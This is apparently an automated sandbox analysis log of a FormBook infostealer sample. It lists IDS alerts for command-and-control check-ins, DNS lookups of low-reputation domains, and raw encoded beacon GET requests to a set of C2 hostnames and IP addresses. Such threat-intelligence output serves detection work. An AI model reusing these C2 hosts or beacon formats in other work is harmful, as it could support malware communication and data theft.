                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49747 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49732 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49711 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49730 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49721 -> 104.21.50.219:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49735 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49748 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49728 -> 154.201.91.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49751 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49749 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49734 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49722 -> 104.21.50.219:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49738 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49729 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49742 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49723 -> 104.21.50.219:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49736 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49724 -> 104.21.50.219:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49704 -> 162.254.32.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49743 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49745 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49750 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49714 -> 172.67.169.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49731 -> 208.91.197.27:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.tgwfj.xyz
                Source: DNS query: www.chatdn.xyz
                Source: DNS query: www.nodefolio.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_002022EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_002022EE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 10 Mar 2025 08:30:32 GMTserver: Apacheset-cookie: __tad=1741595432.2786700; expires=Thu, 08-Mar-2035 08:30:32 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 3b 6f db 30 10 9e ad 5f 71 50 06 c9 48 2d 3a 08 9a 02 b6 a4 0e 05 0a b4 e8 50 24 ed 5c 30 d4 c9 62 2c 91 2a 79 b2 63 04 fe ef 3d ca ca a3 e9 d0 68 b1 48 7e 77 df 43 47 e7 0d 75 6d 19 e5 0d ca 8a 7f 48 53 8b a5 1f 7a 74 8b 4e 7b ca 3c 59 87 b9 38 ed 47 b9 57 4e f7 04 74 e8 b1 88 09 ef 49 dc c9 9d 3c ed c6 e0 9d 2a 62 71 e7 45 ad cd 06 5d ef b4 21 a1 75 8d 59 a7 4d 76 e7 e3 32 17 27 ec ff 5a 95 d1 4e 3a 70 58 69 87 8a 7e b5 da 6c a1 80 a4 21 ea 57 42 ec f7 fb ec b5 46 d1 5e 35 8d f8 98 ac a3 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 72 b9 84 4e 2b 67 3d 2a 6b 2a 0f 64 01 ef 51 0d 84 0c 7c 24 02 5d 03 35 08 2f f4 43 ef 2c b3 f0 9e d4 ad 87 da 3a f0 b6 43 2e 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed ad 54 db eb a9 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 2f 67 e7 49 dd 17 8b 0f c9 7c 1d 1d a3 88 dc 21 54 b2 4a 4f e0 2a f7 63 32 51 80 47 9a 16 e9 6b b6 77 c1 20 d7 cf 42 6c 75 ff 7d d2 5c c0 e7 67 27 5f 6f 58 87 ac d2 87 ce 1a cd 91 f1 c9 2a c8 f6 78 0c 95 4f 55 d1 6c 96 71 08 26 ad 7b 28 4a ee 96 6d 90 ed cc 9f f6 f9 65 e6 d0 0f 2d 85 f3 07 08 eb 89 d8 05 9d c1 4e 72 7e 42 64 3b ed 03 d9 97 6a 3d c2 54 8b f2 d1 52 fa ec 6e 7e 3a 7d 5b 5c 81 66 2c 08 ba 8f c0 58 d5 a4 e8 dc 98 f8 bf df 61 4c f5 e5 e0 d1 81 67 19 6e 6d c5 41 43 c0 6e 9c 1d 4c b5 3a bb 58 5e a8 cb 2b 38 02 a3 47 10 97 4d 17 63 44 df 6e 94 6d ad 2b e2 b3 7a 7c 62 08 73 cb cb e5 f8 f0 d4 e6 95 de c1 58 5b 24 95 f6 ac fe b0 02 63 0d ae 93 32 97 d0 38 ac 8b 37 4c 71 98 87 cb a4 fc d4 6a b5 85 06 1d 8e e3 6a 08 5d 2e 24 5f 22 66 61 2e 63 27 4f 79 87 c4 cd b9 ed 02 7f 0f 7a 57 c4 cc c3 f9 37 31 f0 18 11 17 16 f1 72 0d 3f af bf 15 6f e3 7e 1f 6e ea 53 7b 4e 21 d8 1f d3 08 ff 16 7f 00 60 a3 29 bc 34 04 00 00 Data Ascii: T;o0_qPH-:P$\0b,*yc=hH~wCGumHSztN{<Y8GWNtI<*bqE]!uYMv2'ZN:pXi~l!WBF^5HA;rN+g=*k*dQ|$]5/C,:C."mTU:hJTo/gI|!TJO*c2QGkw Blu}\g'_oX*xOUlq&{(Jme-Nr~Bd;j=TRn~:}[\f,XaLgnmACnL:X^+8GMcDnm+z|bsX[$c287Lqjj].$_"fa.c'OyzW71r?o~nS{N!`)4
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 10 Mar 2025 08:30:35 GMTserver: Apacheset-cookie: __tad=1741595435.3472907; expires=Thu, 08-Mar-2035 08:30:35 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 3b 6f db 30 10 9e ad 5f 71 50 06 c9 48 2d 3a 08 9a 02 b6 a4 0e 05 0a b4 e8 50 24 ed 5c 30 d4 c9 62 2c 91 2a 79 b2 63 04 fe ef 3d ca ca a3 e9 d0 68 b1 48 7e 77 df 43 47 e7 0d 75 6d 19 e5 0d ca 8a 7f 48 53 8b a5 1f 7a 74 8b 4e 7b ca 3c 59 87 b9 38 ed 47 b9 57 4e f7 04 74 e8 b1 88 09 ef 49 dc c9 9d 3c ed c6 e0 9d 2a 62 71 e7 45 ad cd 06 5d ef b4 21 a1 75 8d 59 a7 4d 76 e7 e3 32 17 27 ec ff 5a 95 d1 4e 3a 70 58 69 87 8a 7e b5 da 6c a1 80 a4 21 ea 57 42 ec f7 fb ec b5 46 d1 5e 35 8d f8 98 ac a3 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 72 b9 84 4e 2b 67 3d 2a 6b 2a 0f 64 01 ef 51 0d 84 0c 7c 24 02 5d 03 35 08 2f f4 43 ef 2c b3 f0 9e d4 ad 87 da 3a f0 b6 43 2e 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed ad 54 db eb a9 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 2f 67 e7 49 dd 17 8b 0f c9 7c 1d 1d a3 88 dc 21 54 b2 4a 4f e0 2a f7 63 32 51 80 47 9a 16 e9 6b b6 77 c1 20 d7 cf 42 6c 75 ff 7d d2 5c c0 e7 67 27 5f 6f 58 87 ac d2 87 ce 1a cd 91 f1 c9 2a c8 f6 78 0c 95 4f 55 d1 6c 96 71 08 26 ad 7b 28 4a ee 96 6d 90 ed cc 9f f6 f9 65 e6 d0 0f 2d 85 f3 07 08 eb 89 d8 05 9d c1 4e 72 7e 42 64 3b ed 03 d9 97 6a 3d c2 54 8b f2 d1 52 fa ec 6e 7e 3a 7d 5b 5c 81 66 2c 08 ba 8f c0 58 d5 a4 e8 dc 98 f8 bf df 61 4c f5 e5 e0 d1 81 67 19 6e 6d c5 41 43 c0 6e 9c 1d 4c b5 3a bb 58 5e a8 cb 2b 38 02 a3 47 10 97 4d 17 63 44 df 6e 94 6d ad 2b e2 b3 7a 7c 62 08 73 cb cb e5 f8 f0 d4 e6 95 de c1 58 5b 24 95 f6 ac fe b0 02 63 0d ae 93 32 97 d0 38 ac 8b 37 4c 71 98 87 cb a4 fc d4 6a b5 85 06 1d 8e e3 6a 08 5d 2e 24 5f 22 66 61 2e 63 27 4f 79 87 c4 cd b9 ed 02 7f 0f 7a 57 c4 cc c3 f9 37 31 f0 18 11 17 16 f1 72 0d 3f af bf 15 6f e3 7e 1f 6e ea 53 7b 4e 21 d8 1f d3 08 ff 16 7f 00 60 a3 29 bc 34 04 00 00 Data Ascii: T;o0_qPH-:P$\0b,*yc=hH~wCGumHSztN{<Y8GWNtI<*bqE]!uYMv2'ZN:pXi~l!WBF^5HA;rN+g=*k*dQ|$]5/C,:C."mTU:hJTo/gI|!TJO*c2QGkw Blu}\g'_oX*xOUlq&{(Jme-Nr~Bd;j=TRn~:}[\f,XaLgnmACnL:X^+8GMcDnm+z|bsX[$c287Lqjj].$_"fa.c'OyzW71r?o~nS{N!`)4
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 10 Mar 2025 08:30:38 GMTserver: Apacheset-cookie: __tad=1741595438.3640738; expires=Thu, 08-Mar-2035 08:30:38 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 3b 6f db 30 10 9e ad 5f 71 50 06 c9 48 2d 3a 08 9a 02 b6 a4 0e 05 0a b4 e8 50 24 ed 5c 30 d4 c9 62 2c 91 2a 79 b2 63 04 fe ef 3d ca ca a3 e9 d0 68 b1 48 7e 77 df 43 47 e7 0d 75 6d 19 e5 0d ca 8a 7f 48 53 8b a5 1f 7a 74 8b 4e 7b ca 3c 59 87 b9 38 ed 47 b9 57 4e f7 04 74 e8 b1 88 09 ef 49 dc c9 9d 3c ed c6 e0 9d 2a 62 71 e7 45 ad cd 06 5d ef b4 21 a1 75 8d 59 a7 4d 76 e7 e3 32 17 27 ec ff 5a 95 d1 4e 3a 70 58 69 87 8a 7e b5 da 6c a1 80 a4 21 ea 57 42 ec f7 fb ec b5 46 d1 5e 35 8d f8 98 ac a3 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 72 b9 84 4e 2b 67 3d 2a 6b 2a 0f 64 01 ef 51 0d 84 0c 7c 24 02 5d 03 35 08 2f f4 43 ef 2c b3 f0 9e d4 ad 87 da 3a f0 b6 43 2e 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed ad 54 db eb a9 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 2f 67 e7 49 dd 17 8b 0f c9 7c 1d 1d a3 88 dc 21 54 b2 4a 4f e0 2a f7 63 32 51 80 47 9a 16 e9 6b b6 77 c1 20 d7 cf 42 6c 75 ff 7d d2 5c c0 e7 67 27 5f 6f 58 87 ac d2 87 ce 1a cd 91 f1 c9 2a c8 f6 78 0c 95 4f 55 d1 6c 96 71 08 26 ad 7b 28 4a ee 96 6d 90 ed cc 9f f6 f9 65 e6 d0 0f 2d 85 f3 07 08 eb 89 d8 05 9d c1 4e 72 7e 42 64 3b ed 03 d9 97 6a 3d c2 54 8b f2 d1 52 fa ec 6e 7e 3a 7d 5b 5c 81 66 2c 08 ba 8f c0 58 d5 a4 e8 dc 98 f8 bf df 61 4c f5 e5 e0 d1 81 67 19 6e 6d c5 41 43 c0 6e 9c 1d 4c b5 3a bb 58 5e a8 cb 2b 38 02 a3 47 10 97 4d 17 63 44 df 6e 94 6d ad 2b e2 b3 7a 7c 62 08 73 cb cb e5 f8 f0 d4 e6 95 de c1 58 5b 24 95 f6 ac fe b0 02 63 0d ae 93 32 97 d0 38 ac 8b 37 4c 71 98 87 cb a4 fc d4 6a b5 85 06 1d 8e e3 6a 08 5d 2e 24 5f 22 66 61 2e 63 27 4f 79 87 c4 cd b9 ed 02 7f 0f 7a 57 c4 cc c3 f9 37 31 f0 18 11 17 16 f1 72 0d 3f af bf 15 6f e3 7e 1f 6e ea 53 7b 4e 21 d8 1f d3 08 ff 16 7f 00 60 a3 29 bc 34 04 00 00 Data Ascii: T;o0_qPH-:P$\0b,*yc=hH~wCGumHSztN{<Y8GWNtI<*bqE]!uYMv2'ZN:pXi~l!WBF^5HA;rN+g=*k*dQ|$]5/C,:C."mTU:hJTo/gI|!TJO*c2QGkw Blu}\g'_oX*xOUlq&{(Jme-Nr~Bd;j=TRn~:}[\f,XaLgnmACnL:X^+8GMcDnm+z|bsX[$c287Lqjj].$_"fa.c'OyzW71r?o~nS{N!`)4
                Source: global trafficHTTP traffic detected: GET /7aoy/?SDCxHX=fp2YbicaeZCvjPlEl0aAeG9DbZJy1pf6RkH12Jc9jsEP3xNt5+yvvuwn7GzaPio27TEiEJpJOLWrHvzanHbqYQ6Or2IgxZPOC+3XvFLXIb3BAGz51g==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.5s5zz.icuAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dj43/?SDCxHX=EkKoskt/waFvdKqmMTR0BsFP9LxzFNjCRcrbFleOd9fMl1ZZ6F30QdqQrdjttZXwjkEVztFs7SmMJNK/tzPQzSfbDzyFZPAXpe7tXMSlJsvQQj1JOw==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.mylivingbio.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /b5fo/?SDCxHX=/PlOLkIgBbh1jkr9m9QIpVjNVqN/AQG1t1tA2B5ngzg+2ZPn1SOfaIfgu54OO3WPatKJobuG4vpvl8eIAu2jbDHlHcDWFQTFxMUdlmNIH6RagrB/ww==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.tgwfj.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /esrt/?SDCxHX=Dauko676kCztHQAUUyMqfDrPu2fQElEVTvMTsJhZ5gXLx1NdSwykiYrwT7juNmxOBLlr8LsBbcSb/+BWh1+dS7MQ74zSOEwqVGFp5dGpkXwA4HQ5XA==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.maxank.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /udq7/?SDCxHX=Rfp+Hy7ypq6TblfNmztYCAIAYX0CsX/r1dwSS3/BYvSaAWrqV1h4KNJqwO7WOFQicl/WQZFKFN8T0sKdpeUJ6dExCuTt4rM6fzv9BxJZ8z+n9LSR4w==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.shuangunder.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6q0f/?SDCxHX=wiwQqHwCkimMGK1NgvTGqgIt6yuFWdpgx/vKhmgmOWN7HwxXpwqIUsOeVf/rnfDynropZ5jJ6rh5lht5oeh5g1vgYXjwZOJtCLUyq3gAdMboCSHIfw==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.b47uwch1046r.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /eg1u/?SDCxHX=SD/6wpCnW86cIrWdC51SgvJ3a2i94M6xAqZXzX2LTq+ZxSYJstNKHiEBWhqrQIE7yMyB6clEy8PjJK9sDHiCkqWSr2I1AFfZlCQR8B5OlbrlQkQ77w==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.full4movies.christmasAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1lu1/?SDCxHX=gnLWuwl3YNLZq+kfxPrzV/SzdlLbLr9wjJY4ZtQulD85or1kaYgFmp8RYbKmTg0As5h6Mjvom9+7CRNf5gL+FjZEfFdpELUxb+hALxTzdn2cN/0iIw==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.boa-first-option.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /80od/?SDCxHX=IuBU55xvok3HLpzr12SaTGfRHMw0zfdZqh5Gq7N5X/kkFlbQTPRvjQimlDDv2Xk75v4IRLPjg1IsLOv52448o6bsNdlkY9XWVc0I+iPRM3X0mYgVVw==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.12345lopkmj.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /d478/?SDCxHX=yZiSYoN2a3htTd2ewqQl0+84PN30OlSoYMbqUQeMjg/YAZw5n93PIWGpgWWmb8mQ8VOILxP51EOaJbDvkr6ma0bGOT1AFeFG+Wzx2IZfaWAj22zYUA==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.utzp.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /wdfk/?SDCxHX=dQ/vpVbcLME9vwPjn0SG03f3yT2qEOly+d50wcZtmmpldahEUd9gA/U/hLKsV6Bf0aiX/H+ppQZXy0qtZ/D2JfLyaAKLEvfZbFVBsODUwCGpU0jZBg==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.keys4health.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7ciy/?SDCxHX=zHKEIz0o2n6jgB/iw2njPHtSPGufLrEQVl5Rhq17f2fLN5qLroapQ67U0eY+CFXVn3WbdiYa7ZubGC6ertIl3Fo6zXUtHtpnY2a8majy5zIjAx7Xxg==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.chatdn.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /b3dy/?SDCxHX=h9bs7PJVxZ24zAp/wev+K8YBHIkq/puSw5AYHhggM3Al5Cg+4lnT1wleJpI9wHWBpVcO5JhmorqlsWRv+OmF467mp87Zl1ReB2z6NOUjN9KF+OCfWQ==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.nodefolio.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /vwqy/?SDCxHX=v3ZoZSKmjs/ElY9Kz1JRAnSwUAxLKu7hzg3dHORkdyRJknvTPlvLy9hszWAf9XBOUxgBVtKXDaR+AVr7OKAzFqnVNHYm2A86x8JoYjCkKSl/TM4yfg==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.lindaashley.weddingAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qm65/?SDCxHX=WKDdNWC7INV6sdOGlRhYeERsi/jVAkm/zrWG+knbwk3UKiu1mAWcQNEx7C72Rm2XZizvCRn0VF5y6M8t/wPON6UNqb6uZofGUm9y0DP9EFHZFe+aag==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.myhandyplanner.coursesAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.5s5zz.icu
                Source: global trafficDNS traffic detected: DNS query: www.mylivingbio.online
                Source: global trafficDNS traffic detected: DNS query: www.tgwfj.xyz
                Source: global trafficDNS traffic detected: DNS query: www.maxank.top
                Source: global trafficDNS traffic detected: DNS query: www.shuangunder.shop
                Source: global trafficDNS traffic detected: DNS query: www.b47uwch1046r.shop
                Source: global trafficDNS traffic detected: DNS query: www.full4movies.christmas
                Source: global trafficDNS traffic detected: DNS query: www.boa-first-option.click
                Source: global trafficDNS traffic detected: DNS query: www.12345lopkmj.lol
                Source: global trafficDNS traffic detected: DNS query: www.utzp.top
                Source: global trafficDNS traffic detected: DNS query: www.keys4health.net
                Source: global trafficDNS traffic detected: DNS query: www.chatdn.xyz
                Source: global trafficDNS traffic detected: DNS query: www.nodefolio.xyz
                Source: global trafficDNS traffic detected: DNS query: www.lindaashley.wedding
                Source: global trafficDNS traffic detected: DNS query: www.myhandyplanner.courses
                Source: global trafficDNS traffic detected: DNS query: www.super-mist.store
